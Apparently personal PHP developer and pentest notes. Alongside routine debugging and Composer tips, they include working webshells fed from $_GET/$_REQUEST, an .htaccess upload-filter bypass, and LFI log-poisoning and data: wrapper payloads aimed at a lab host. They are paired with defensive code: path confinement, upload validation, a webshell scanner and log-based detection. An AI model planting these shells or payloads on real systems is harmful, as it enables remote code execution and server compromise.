Display errors
<?php
// Development only. On a reachable/production host keep display_errors=0
// and log instead (log_errors=1 + error_log): displayed errors leak file
// paths, stack traces and sometimes query fragments to the client.
error_reporting(E_ALL);
ini_set("display_errors", 1);
// Startup errors happen before the script runs, so this one only has an
// effect when set in php.ini, not via ini_set().
ini_set("display_startup_errors", 1);
ini_set("log_errors", 1);
ini_set("error_log", "/projects/file_error.log");
error_log("Hello, errors!");
Xdebug
Reference config: https://gist.github.com/jamesstout/fd6eae2b2ba34e7f32ff3e1a179d55fe
Check whether the extension is loaded:
php -i | grep xdebug
php.ini / conf.d settings (Xdebug 2 names):
zend_extension=xdebug.so
xdebug.idekey="XDEBUG_ECLIPSE"
xdebug.remote_enable = 1
xdebug.remote_autostart = 1
xdebug.remote_connect_back = 1
xdebug.remote_port = 9000
xdebug.max_nesting_level = 512
xdebug.remote_host = 10.0.2.2
xdebug.remote_log = /var/log/xdebug.log
sudo /etc/init.d/apache2 restart
Caveat: remote_connect_back=1 makes Xdebug ignore remote_host and connect back to whatever address made the request (REMOTE_ADDR, or X-Forwarded-For if present). Together with remote_autostart=1 this means anyone who can reach the web server gets a DBGp session, and DBGp's eval command runs arbitrary PHP as the web server user. Use these settings only on a host that is not reachable from untrusted networks, or set remote_autostart=0 so a session is only started by the XDEBUG_SESSION_START trigger and pin remote_host to the IDE.
Xdebug 3 renamed all of this: xdebug.mode=debug, xdebug.start_with_request=yes (or trigger), xdebug.discover_client_host=1 (replaces remote_connect_back), xdebug.client_host, xdebug.client_port (default now 9003, not 9000) and xdebug.log.
Random _GET
Reading a file named by an unvalidated GET parameter. Nothing keeps $file inside files/, so ?file=../../etc/passwd reads outside it (path traversal):
<?php
$file = $_GET['file'];
$fh = fopen("files/$file", "r");   // no check that $file stays inside files/
while ($line = fgets($fh)) {
    echo $line;
}
fclose($fh);
Minimal webshell: runs whatever arrives in cmd, from GET, POST or (depending on request_order) cookies, since $_REQUEST merges them:
<?php
if (isset($_REQUEST['cmd'])) {
    echo exec($_REQUEST['cmd']);   // exec() returns only the last line of output
}
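The file read above, with the user-supplied name confined to a base directory. This is an added example, not code from the original notes; the same check applies to an include($_GET['file']) like the menu.php?file= case in the LFI section further down. It assumes PHP 8 (str_contains/str_starts_with) and uses a throwaway temp directory with constructed files for the demo.

```php
<?php
// Added example: confine a user-supplied file name to a base directory.

/**
 * Resolve $name inside $baseDir and return the absolute path, or null if the
 * name uses a stream wrapper, contains a NUL byte, escapes the directory,
 * or does not point at an existing file.
 */
function safe_path(string $baseDir, string $name): ?string
{
    // Reject wrappers (php://, data:, http://, ...) and NUL bytes before
    // touching the filesystem. The scheme pattern also rejects Windows
    // drive prefixes such as c:\, which is intended.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $name) || str_contains($name, "\0")) {
        return null;
    }
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $full === false) {
        return null;   // base missing, file missing, or dangling symlink
    }
    // realpath() has collapsed ../ and symlinks, so a prefix check is reliable.
    // The trailing separator stops /srv/files_evil from passing as /srv/files.
    if (!str_starts_with($full, $base . DIRECTORY_SEPARATOR)) {
        return null;   // resolved outside the base directory
    }
    return $full;
}

/** Read a file from $baseDir by user-supplied name; false when refused. */
function read_user_file(string $baseDir, string $name): string|false
{
    $path = safe_path($baseDir, $name);
    return $path === null ? false : file_get_contents($path);
}

// Demo with a constructed directory: one file inside, one just outside it.
$base = sys_get_temp_dir() . '/files_' . bin2hex(random_bytes(4));
$outside = dirname($base) . '/outside_' . basename($base);
mkdir($base);
file_put_contents("$base/readme.txt", "hello\n");
file_put_contents($outside, "secret\n");

$attempts = [
    'readme.txt',                               // legitimate
    '../' . basename($outside),                 // traversal
    'php://filter/resource=readme.txt',         // wrapper
    "readme.txt\0.jpg",                         // NUL byte
];
foreach ($attempts as $name) {
    printf("%-40s => %s\n", addcslashes($name, "\0"), var_export(read_user_file($base, $name), true));
}

unlink("$base/readme.txt");
unlink($outside);
rmdir($base);
```

Only the first name yields the file contents; the traversal, wrapper and NUL-byte names are all refused before any read happens. If the set of readable files is small, an explicit allowlist (a map from page name to path) is simpler still and removes the filesystem resolution entirely.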
Start the built-in server in PHP
cd ~/public_html
php -S localhost:8080
php -S IP:PORT -t web_dir/
This is a single-process development server: it serves every file under the document root and ignores .htaccess, so it is not the place to test the AddType trick below. Binding to 0.0.0.0 instead of localhost exposes the directory to the whole network.
Wordpress log sql queries
<?php
// Include this in the theme's functions.php (or a small mu-plugin).
// posts_request only fires for the SQL built by WP_Query, not for every
// query $wpdb runs; use the 'query' filter or SAVEQUERIES for the rest.
function log_sql_queries($text_query) {
    /* Uncomment for a backtrace of where the query comes from and which
       action started it off.
    $i = 0;
    $args = null;
    foreach (debug_backtrace() as $trace) {
        if ($trace['function'] == 'do_action') {
            $args = $trace['args'];
        }
        error_log("TRACE:$i:" . $trace['function'] . print_r($args, 1));
        $i++;
    }
    */
    // Queries contain user-supplied values, so keep this log out of the web root.
    error_log("INFO:SQL: " . $text_query);
    return $text_query;   // a filter must hand the value back unchanged
}
add_filter( 'posts_request', 'log_sql_queries', 500 );
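The filter above only sees the main posts query. The following is an added example (not from the original notes, and not WordPress core code) that logs every statement $wpdb executes, and, when SAVEQUERIES is defined, the timing and calling function chain of each one. It assumes it is loaded by WordPress (functions.php or an mu-plugin); the log line prefixes are my own.

```php
<?php
// Added example: log all $wpdb queries, not only the WP_Query SQL.

// 1. The 'query' filter runs inside $wpdb->query() for every statement.
//    Newlines are collapsed only in the logged copy; $sql is returned as-is.
add_filter('query', function ($sql) {
    if (is_string($sql)) {
        error_log('INFO:SQL: ' . preg_replace('/\s+/', ' ', $sql));
    }
    return $sql;
}, 500);

// 2. With define('SAVEQUERIES', true); in wp-config.php, $wpdb->queries holds
//    [sql, elapsed seconds, caller chain, ...] per query. Dump it at shutdown,
//    once all hooks have run. Like the log above, this contains user data and
//    costs memory on busy pages, so keep it to debugging sessions.
add_action('shutdown', function () {
    global $wpdb;
    if (!defined('SAVEQUERIES') || !SAVEQUERIES || empty($wpdb->queries)) {
        return;
    }
    foreach ($wpdb->queries as $entry) {
        [$sql, $elapsed, $caller] = $entry;
        error_log(sprintf('INFO:SQLTIME: %.4fs %s <- %s',
            $elapsed, preg_replace('/\s+/', ' ', $sql), $caller));
    }
});
```

The caller chain recorded by SAVEQUERIES answers the "which action started it off" question that the commented-out debug_backtrace() above was trying to answer, without walking the stack on every query.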
Switch between php versions in MacOS
brew unlink php@<old-version>
brew link --force php@<new-version>
Replace the placeholders with the installed formula names (brew list | grep php). Versioned php formulas are keg-only, so the link needs --force; add --overwrite if brew complains about existing files.
Composer
Composer update keys
composer self-update --update-keys
Prompts for the public keys (published at https://composer.github.io/pubkeys.html) that composer uses to verify the signature of each self-update; keep them current or self-update refuses to run.
Change composer version
composer self-update --1   # roll back to the 1.x branch
composer self-update --2   # back to the 2.x branch
Run composer update without a memory limit
php -d memory_limit=-1 `which composer` update
Code execution
On PHP server
Test page that runs ?cmd= through each execution primitive. They differ: passthru() and system() print the output themselves, shell_exec() and exec() only return it, and popen() needs a mode and hands back a stream. disable_functions in php.ini decides which of them are available; the phpinfo() at the end shows that setting.
<?php
echo '<pre>';
echo 'passthru: ';
passthru($_GET['cmd']);
echo "----\n";
echo 'system: ';
system($_GET['cmd']);
echo "----\n";
echo 'shell_exec: ';
echo shell_exec($_GET['cmd']);          // returns the output, prints nothing itself
echo "----\n";
echo 'exec: ';
exec($_GET['cmd'], $out);               // all lines land in $out, return value is the last one
echo implode("\n", $out), "\n";
echo "----\n";
echo 'popen: ';
$p = popen($_GET['cmd'], 'r');          // the mode argument is required
echo stream_get_contents($p);
pclose($p);
echo "----\n";
eval("phpinfo();");                     // eval() needs a complete statement, semicolon included
echo '</pre>';
?>
We can also use the following, which renders a form to run commands from (one line; the form posts back to the script itself):
<html><body><form method="GET" action="<?php echo basename($_SERVER['PHP_SELF']); ?>"><input type="text" name="cmd" autofocus id="cmd" size="100"><input type="submit" value="Go"></form><pre><?php if(isset($_GET["cmd"])) { system($_GET["cmd"]); } ?></pre></body></html>
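The other side of these test pages is finding them. Below is an added example, not from the original notes, of a small static scanner for the pattern used on this page: an execution primitive whose argument list contains request data ($_GET, $_POST, $_REQUEST, $_COOKIE, ...) plus any use of eval(). It works on PHP's own token stream rather than regexes, so string literals and comments mentioning system() do not trigger it. The sample files at the bottom are constructed for the demo; the function list is my own choice.

```php
<?php
// Added example: token-based scan for "exec primitive fed from request data".

const EXEC_FUNCS = ['passthru', 'system', 'shell_exec', 'exec', 'popen', 'proc_open', 'pcntl_exec'];
const REQUEST_VARS = ['$_GET', '$_POST', '$_REQUEST', '$_COOKIE', '$_FILES', '$_SERVER'];

/** Return a list of [line, description] findings for one PHP source string. */
function scan_php_source(string $src): array
{
    $findings = [];
    $tokens = token_get_all($src);
    $n = count($tokens);
    for ($i = 0; $i < $n; $i++) {
        $t = $tokens[$i];
        if (!is_array($t)) {
            continue;                       // single-character tokens: ( ) ; etc.
        }
        if ($t[0] === T_EVAL) {
            $findings[] = [$t[2], 'eval() call'];
            continue;
        }
        if ($t[0] !== T_STRING || !in_array(strtolower($t[1]), EXEC_FUNCS, true)) {
            continue;
        }
        // Skip whitespace to the opening parenthesis; no "(" means it is not a call.
        $j = $i + 1;
        while ($j < $n && is_array($tokens[$j]) && $tokens[$j][0] === T_WHITESPACE) {
            $j++;
        }
        if ($j >= $n || $tokens[$j] !== '(') {
            continue;
        }
        // Walk the balanced argument list looking for request superglobals.
        $depth = 0;
        for ($k = $j; $k < $n; $k++) {
            $tk = $tokens[$k];
            if ($tk === '(') {
                $depth++;
            } elseif ($tk === ')' && --$depth === 0) {
                break;
            } elseif (is_array($tk) && $tk[0] === T_VARIABLE && in_array($tk[1], REQUEST_VARS, true)) {
                $findings[] = [$t[2], sprintf('%s() fed from %s', strtolower($t[1]), $tk[1])];
                break;
            }
        }
    }
    return $findings;
}

// Constructed samples: two shells, a form shell, and a benign script that
// calls exec() with a fixed command.
$samples = [
    'shell.php'  => "<?php\nif (isset(\$_REQUEST['cmd'])) {\n    echo exec(\$_REQUEST['cmd']);\n}\n",
    'form.php'   => "<html><pre><?php if(isset(\$_GET['cmd'])) { system(\$_GET['cmd']); } ?></pre></html>",
    'cfg.php'    => "<?php\n// harmless config\neval(base64_decode(\$_POST['p']));\n",
    'backup.php' => "<?php\nexec('tar czf /tmp/backup.tgz /var/www/html', \$out);\necho count(\$out);\n",
];

foreach ($samples as $name => $src) {
    $hits = scan_php_source($src);
    printf("%-11s %s\n", $name, $hits ? '' : 'clean');
    foreach ($hits as [$line, $desc]) {
        printf("  line %d: %s\n", $line, $desc);
    }
}
```

backup.php is reported clean because its exec() argument is a fixed string; the other three are flagged with the line number of the call. This catches the plain shells on this page, not deliberate evasion: variable functions ($f = 'sys' . 'tem'; $f($c)), the backtick operator, call_user_func(), or data copied out of a superglobal into a local first all need extra rules or a proper taint analysis.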
Bypass PHP upload filter
If the upload check only blocks known extensions (.php, .phtml, .phar, ...) but the upload directory honours .htaccess, first upload a .htaccess containing
AddType application/x-httpd-php .cth
and then upload the shell as shell.cth; mod_php now executes it. This needs mod_php (with php-fpm behind a proxy handler the AddType has no effect) and AllowOverride FileInfo for the directory; with AllowOverride None the .htaccess is ignored.
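The fix is to stop relying on an extension denylist at all. Below is an added example, not from the original notes, of an upload handler that applies an extension allowlist to every extension in the name, sniffs the content type, and stores the file under a random name. The allowed types, storage directory and the demo files are assumptions; because move_uploaded_file() refuses anything that did not arrive via HTTP, the offline demo exercises only the validation step.

```php
<?php
// Added example: upload validation that leaves the AddType trick nothing to use.

const ALLOWED = [            // extension => MIME type that content sniffing must report
    'png' => 'image/png',
    'jpg' => 'image/jpeg',
    'pdf' => 'application/pdf',
];

/**
 * Validate an upload by name and content; returns the allowed extension or
 * throws with the reason for rejection.
 */
function validate_upload(string $originalName, string $tmpPath): string
{
    // 1. Every extension in the name must be allowed. Apache's mod_mime looks at
    //    all of them, so shell.php.png would still run as PHP. Dotfiles such as
    //    .htaccess have an empty base name and are rejected here as well.
    $parts = explode('.', basename($originalName));
    $exts = array_map('strtolower', array_slice($parts, 1));
    if ($parts[0] === '' || $exts === [] || array_diff($exts, array_keys(ALLOWED)) !== []) {
        throw new RuntimeException("extension not allowed: $originalName");
    }
    $ext = end($exts);

    // 2. Sniff the content; the client-supplied Content-Type is not trusted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException("content is $mime, expected " . ALLOWED[$ext]);
    }
    return $ext;
}

/**
 * Validate and move an upload into $storeDir under a random name. $storeDir
 * should sit outside the web root (or be served with php_admin_flag engine off
 * and AllowOverride None) so nothing in it is ever executed.
 */
function store_upload(string $originalName, string $tmpPath, string $storeDir): string
{
    $ext = validate_upload($originalName, $tmpPath);
    // 3. The client's file name never reaches the filesystem.
    $dest = rtrim($storeDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($tmpPath, $dest)) {
        throw new RuntimeException('move failed (not an HTTP upload, or target not writable)');
    }
    chmod($dest, 0640);
    return $dest;
}

// Offline demo of the validation with constructed files: a PHP shell body
// and a minimal PNG (signature plus an IHDR chunk; the CRC is not checked here).
$shell = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($shell, "<?php system(\$_GET['cmd']); ?>");
$png = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($png, "\x89PNG\r\n\x1a\n\x00\x00\x00\x0dIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x02\x00\x00\x00\x90\x77\x53\xde");

$cases = [
    ['shell.cth', $shell], ['.htaccess', $shell], ['shell.php.png', $shell],
    ['shell.png', $shell], ['photo.png', $png],
];
foreach ($cases as [$name, $path]) {
    try {
        printf("%-14s accepted as .%s\n", $name, validate_upload($name, $path));
    } catch (RuntimeException $e) {
        printf("%-14s rejected: %s\n", $name, $e->getMessage());
    }
}
unlink($shell);
unlink($png);
```

shell.cth, .htaccess and shell.php.png fail the name check, shell.png fails the content check (finfo reports the PHP source as text rather than image/png), and only photo.png is accepted. Even if a check were bypassed, the random name and out-of-web-root storage mean the attacker never learns a URL that would execute the file.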
LFI (Local File Inclusion): contaminating log files
Write PHP code into a log file that the vulnerable include() can read, then include the log to execute shell commands.
1. Send the payload as a raw request so it lands in the access log (the malformed request line is logged even though Apache answers 400):
kali@kali:~$ nc -nv 10.11.0.22 80
(UNKNOWN) [10.11.0.22] 80 (http) open
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
2. Call the LFI with the log path as the file and the command in cmd:
http://10.11.0.22/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig
Any logged field works the same way (request line, User-Agent, Referer). The log must be readable by the web server user, and every other line in it is echoed along with the command output, so keep the payload small and do it once.
RFI (Remote File Inclusion) / PHP wrappers
http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
executes arbitrary PHP through the data: wrapper. data:, php://input and http:// all require allow_url_include=On; php://filter is not restricted by that setting but only reads, e.g. php://filter/convert.base64-encode/resource=menu.php to dump the source of the vulnerable script.
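Seen from the defender's side, both techniques leave clear traces in the access log. The following is an added example, not from the original notes, of detection logic run over constructed Apache combined-format log lines that replay the scenario above: it flags requests that plant PHP code in a logged field (log poisoning) and include parameters that point at logs, traverse directories or use stream wrappers. The parameter names, IPs and log lines are assumptions.

```php
<?php
// Added example: detect log poisoning and LFI/wrapper attempts in access logs.

const COMBINED = '/^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/';
const INCLUDE_PARAMS = ['file', 'page', 'include', 'path', 'template'];   // assumed names

/** Return a list of [client, reason] findings for one log line, or [] if clean. */
function analyse_log_line(string $line): array
{
    if (!preg_match(COMBINED, rtrim($line), $m)) {
        return [['?', 'unparseable line: ' . substr($line, 0, 60)]];
    }
    [, $client, $request, , $referer, $ua] = $m;
    $findings = [];

    // (a) PHP open tags in any field an attacker controls. Decode twice so that
    //     double-encoded payloads (%253C%253F) are seen too.
    foreach (['request' => $request, 'referer' => $referer, 'user-agent' => $ua] as $field => $value) {
        $decoded = urldecode(urldecode($value));
        if (preg_match('/<\?(php|=)/i', $decoded)) {
            $findings[] = [$client, "PHP open tag in $field: " . substr($decoded, 0, 60)];
        }
    }

    // (b) Suspicious values in parameters that typically feed include().
    $parts = explode(' ', $request, 3);
    $query = parse_url($parts[1] ?? '', PHP_URL_QUERY);
    if (is_string($query)) {
        parse_str($query, $params);              // decodes once
        foreach ($params as $name => $value) {
            if (!is_string($value) || !in_array(strtolower((string) $name), INCLUDE_PARAMS, true)) {
                continue;
            }
            $v = urldecode($value);
            if (preg_match('#(^|[/\\\\])\.\.([/\\\\]|$)#', $v)) {
                $findings[] = [$client, "directory traversal in $name=$v"];
            } elseif (preg_match('#^(php|data|file|expect|phar|zip|https?|ftp)://#i', $v)
                      || preg_match('#^data:#i', $v)) {
                $findings[] = [$client, "stream wrapper in $name=$v"];
            } elseif (preg_match('#(access|error)[._]?log#i', $v)) {
                $findings[] = [$client, "log file as include target: $name=$v"];
            }
        }
    }
    return $findings;
}

// Constructed sample log: 10.11.0.5 plays the attacker from the notes above,
// 192.168.1.20 is a normal visitor. Nowdoc keeps the $_GET and backslashes literal.
$log = <<<'LOG'
10.11.0.5 - - [01/Jan/2024:10:00:00 +0000] "<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>" 400 226 "-" "-"
10.11.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.11.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /menu.php?file=data:text/plain,%3C%3Fphp%20echo%20shell_exec(%22dir%22)%20%3F%3E HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.11.0.5 - - [01/Jan/2024:10:00:12 +0000] "GET /menu.php?file=../../../../etc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.1.20 - - [01/Jan/2024:10:01:00 +0000] "GET /menu.php?file=about HTTP/1.1" 200 1337 "http://10.11.0.22/" "Mozilla/5.0"
LOG;

foreach (explode("\n", $log) as $line) {
    foreach (analyse_log_line($line) as [$client, $reason]) {
        echo "$client: $reason\n";
    }
}
```

The first line is the poisoning request itself (open tag in the request field), the second is the include of the log, the third trips both the open-tag check and the wrapper check, the fourth is plain traversal, and the visitor's request produces nothing. In practice the status code matters too: a 400 with a PHP open tag followed shortly by a 200 on the same script from the same client is the sequence to alert on, and the same client pivoting to a wrapper is a sign that allow_url_include is on and needs turning off.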